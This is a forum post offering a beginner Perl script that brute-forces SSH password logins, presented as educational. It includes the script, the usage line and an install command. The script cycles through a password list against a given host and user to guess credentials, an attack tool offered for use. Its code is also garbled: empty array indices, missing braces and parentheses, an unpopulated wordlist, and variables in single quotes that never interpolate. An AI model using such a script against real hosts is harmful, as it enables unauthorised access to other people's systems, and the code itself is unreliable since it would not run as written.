[Scripting] Simple SSH Bruteforce Script in Perl

3 replies [Last post]
frey443's picture
Joined: 2017/11/19


Frey here with a simple script that I've scripted in Perl aimed toward beginners.

This is a simple SSH bruteforce script for user-password authentication. I should note that this won't work if the server uses keys which is more secure and most use now, but this isn't about much about hacking but more about education and learning a new language. Please use this and improve it if you wish.

The code:


use Net::SSH::Expect;

my $username = @ARGV[];
my $password_list = @ARGV[1];
my $host = @ARGV[2];
my $ssh;

#usage: perl ssh_brute.pl username password_list host

open(WORDLIST, "$password_list")
        or die "[!] Failed to open: $password_list";

#read each line of the file
#try it as a password


foreach $password (@wordlist)

        print "[*]Trying $password \n";
        #try the password with user-password authentication
        #build the constructor
        my $ssh = Net::SSH::Expect -> new (
        host => "$host",
        password => '$password',
        user => '$username',
        raw_pty => 1
        if($ssh -> login())

                print "[*]$password is the password to $host.";
                $ssh -> close();


die "[!] Password was not found.";

To run it, simply type: perl ssh_brute.pl username password_list host

If you get a error that Net::SSH::Expect is missing, please run:



install Net::SSH::Expect

And this should install the required library.